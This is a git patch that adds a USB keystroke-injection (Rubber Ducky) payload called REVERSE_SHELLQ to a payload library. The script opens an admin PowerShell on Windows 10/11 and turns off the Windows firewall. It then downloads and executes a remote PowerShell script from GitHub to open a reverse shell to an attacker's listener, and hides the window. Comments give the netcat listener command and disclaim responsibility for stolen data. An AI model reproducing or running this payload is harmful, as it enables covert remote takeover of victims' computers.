From 13e7756d1e2815d9dcbc21feb072e153e8a9d18c Mon Sep 17 00:00:00 2001 From: MajoesQ <144555175+MajoesQ@users.noreply.github.com> Date: Sat, 23 Dec 2023 11:33:07 +0100 Subject: [PATCH] REVERSE_SHELLQ Props: Majoesq Targets: Windows 11/10 Attacker: Kali Linux Description: REVERSE_SHELLQ Disables Windows Firewall Creates Reverse Shell |USING POWERSHELL| USE ON YOUR OWN RISK --- payloads/library/remote_access/REVERSE_SHELLQ | 41 +++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 payloads/library/remote_access/REVERSE_SHELLQ diff --git a/payloads/library/remote_access/REVERSE_SHELLQ b/payloads/library/remote_access/REVERSE_SHELLQ new file mode 100644 index 0000000..113570b --- /dev/null +++ b/payloads/library/remote_access/REVERSE_SHELLQ @@ -0,0 +1,41 @@ + REM ######################################################################################################################### + REM Title: REVERSE_SHELLQ + REM Description: Disables Windows Firewall And Starts A Minimized Reverse Shell + REM Props: MajoesQ + REM Targets: Windows 10/11 {TESTED ON WINDOWS 11/10} + REM MajoesQ ASSUMES NO RESPONSIBILITY FOR ANY DAMAGES OR STOLEN DATA "USE AT YOUR OWN RISK" + REM DON'T FORGET TO START LISTENER "stty raw -echo; (stty size; cat) | nc -lvnp PORT ATACKERS_IP {FOR LINUX} + REM DON'T FORGET TO CHANGE ATACKERS IP AND PORT IN LINE 25 + REM DON'T FORGET TO ENCODE AT "https://payloadstudio.hak5.org/community/" + REM ######################################################################################################################### +REM ENJOY :} +DELAY 1000 +GUI x +DELAY 500 +STRING a +DELAY 500 +LEFT +DELAY 500 +ENTER +DELAY 500 +STRING netsh advfirewall set allprofiles state off +DELAY 600 +ENTER +DELAY 1000 +STRING IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell IP PORT +DELAY 1000 +ENTER +ALT SPACE +DELAY 400 +DOWN +DELAY 400 +DOWN +DELAY 400 +DOWN +DELAY 400 +DOWN +DELAY 400 +ENTER +CAPSLOCK +END +REM This is the end #################################################################################################################################################